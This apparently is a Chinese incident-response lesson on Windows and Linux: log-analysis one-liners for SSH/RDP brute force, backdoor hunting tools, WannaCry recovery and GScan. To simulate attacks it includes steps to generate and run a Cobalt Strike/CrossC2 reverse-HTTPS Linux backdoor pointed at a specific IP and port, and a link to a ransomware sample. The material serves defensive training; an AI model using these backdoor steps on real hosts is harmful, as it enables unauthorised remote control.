操作系統(windows,linux)應急響應:
- 1.常見危害:暴力破解,漏洞利用,流量攻擊,木馬控制(Webshell,PC 木馬等),病毒感染(挖礦,蠕蟲,勒索等)
- 2.常見分析:計算機賬戶,端口,進程,網絡,啟動,服務,任務,文件等安全問題
常見日志類別及存儲:
- Windows,Linux
補充資料:
- https://xz.aliyun.com/t/485 應急響應大合集
- https://www.secpulse.com/archives/114019.html 最全Windows安全工具錦集
- https://docs.microsoft.com/en-us/sysinternals/ windows官方工具
病毒分析:
- PCHunter:http://www.xuetr.com
- 火絨劍:https://www.huorong.cn
- Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
- processhacker:https://processhacker.sourceforge.io/downloads.php
- autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- OTL:https://www.bleepingcomputer.com/download/otl/
- SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector
病毒查殺:
- 卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
- 大蜘蛛:http://free.drweb.ru/download+cureit+free
- 火絨安全軟件:https://www.huorong.cn
- 360 殺毒:http://sd.360.cn/download_center.html
病毒動態:
- CVERC-國家計算機病毒應急處理中心:http://www.cverc.org.cn
- 微步在線威脅情報社區:https://x.threatbook.cn
- 火絨安全論壇:http://bbs.huorong.cn/forum-59-1.html
- 愛毒霸社區:http://bbs.duba.net
- 騰訊電腦管家:http://bbs.guanjia.qq.com/forum-2-1.html
在線病毒掃描網站:
- http://www.virscan.org //多引擎在線病毒掃描網
- https://habo.qq.com //騰訊哈勃分析系統
- https://virusscan.jotti.org //Jotti 惡意軟件掃描系統
- http://www.scanvir.com //計算機病毒、手機病毒、可疑文件分析
本課重點:
- 案例1:攻擊響應-暴力破解(RDP,SSH)-Win,Linux
- 案例2:控制響應-后門木馬(Webshell,PC)-Win,Linux
- 案例3:危害響應-病毒感染(勒索 WannaCry)-Windows
- 案例4:自動化響應檢測-Gscan 多重功能腳本測試-Linux
案例1:攻擊響應-暴力破解(RDP,SSH)-Win,Linux
Windows-LogFusion 載入查看:
事件歸類,事件 ID,事件狀態等,參考百度資料
Linux-grep 篩選:
1、統計了下日志,確認服務器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c
2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1
3、進一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr
4、爆破用戶名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
案例演示1-windows日志查看
windows日志位置
windows自帶日志工具不好用,查找分析不方便,推薦使用插件LogFusion
<1>LogFusion載入應用程序、硬件事件、安全、系統等日志
<2>使用弱口令工具進行暴力破解(選擇RDP協議),模擬攻擊
<3>在安全日志里看到很多賬戶登錄失敗的日志,可以判斷當前主機遭受了爆破攻擊,以及是否成功等
<4>雙擊進入,查看詳細信息(可以看到是哪個IP地址爆破密碼成功,成功登錄了本機)
案例演示2-linux日志查看
linux日志位置
<1>首先使用弱口令工具進行暴力破解(選擇SSH協議),模擬攻擊
<2>linux日志分析,使用grep篩選
案例2:控制響應-后門木馬(Webshell,PC)-Win,Linux
windows:默認配置測試 linux 借助 CrossC2 項目:netstat -ntulp https://github.com/gloxec/CrossC2 https://github.com/darkr4y/geacon 參考過程:http://www.adminxe.com/1287.html CS借助CrossC2項目上線linux主機過程: 1.項目上傳至服務端目錄,給予執行權限 2.配置監聽器: windows/beacon_https/reverse_https 阿里雲記得端口放行 3.生成后門: ./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2 通過網絡監聽工具及 windows 日志分析或執行記錄查找后門問題
案例演示1-windows分析
<1>windows執行木馬,CS上線,模擬攻擊
<2>TCPView工具,可以查看哪個進程與遠程IP通信過,從而確定系統是否曾經遭受過攻擊。但是這個軟件不太好用,上一步執行過的artifact.exe木馬都沒篩選出來。
<3>Process Explorer工具,可以查看分析進程
<4>PCHunter工具。缺點是,windows高版本網絡信息,獲取不全。比如木馬在windows7執行后,該工具可以獲取網絡信息,如下圖。但是同一木馬在windows2018執行后,該工具獲取不到網絡信息。
<5>UserAssistView工具,可以看到所有在windows系統上執行過的文件
<6>logonsession工具,可以看到當前主機有哪些會話連接過,從而分析有沒有過遠程攻擊
<7>autoruns工具,可以查看windows系統的自啟動項目,從而發現是否有木馬病毒等
案例演示2-linux分析
CS是windows滲透工具,但是后期經過一些插件的開發,CS也可以上線linux系統,比如CS借助CrossC2項目上線linux主機
<1>項目上傳至服務端目錄,給予執行權限
<2>配置監聽器:windows/beacon_https/reverse_https 阿里雲記得端口放行
<3>生成后門:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
<4>將后門上傳到linux主機並執行
<5>CS成功上線
<6>接下來就是分析日志,查找后門等,具體可見案例4。
案例3:危害響應-病毒感染(勒索 WannaCry)-Windows
詳細說明中毒表現及恢復指南 推薦2個勒索病毒解密網站 https://lesuobingdu.360.cn/ https://www.nomoreransom.org/zh/index.html [下載]永恆之藍樣本(勒索病毒): https://bbs.pediy.com/thread-217586-1.htm
案例演示
<1>下載勒索病毒樣本,在虛擬機上執行(不要在本機執行,謹慎執行)
<2>中毒后顯示如下
<3>打開任何文件都亂碼,彈框
<4>可以使用360勒索病毒解密網站進行病毒查詢、在線解密等。
<5>也可以使用nomoreransom網站嘗試解密。
案例4:自動化響應檢測-Gscan 多重功能腳本測試-Linux
參考:https://github.com/grayddq/GScan/ 自動化響應檢測工具:GScan、chkrootkit、rkhunter、lynis 都下載一下,應急響應時全都跑一遍
案例演示
<1>執行Gscan腳本
<2>可以看到,黑客進行了哪些攻擊行為,是否成功等。
<3>netstat -ntl可以查看tcp端口等,再通過ps命令找到對應的進程,分析其是否是木馬病毒
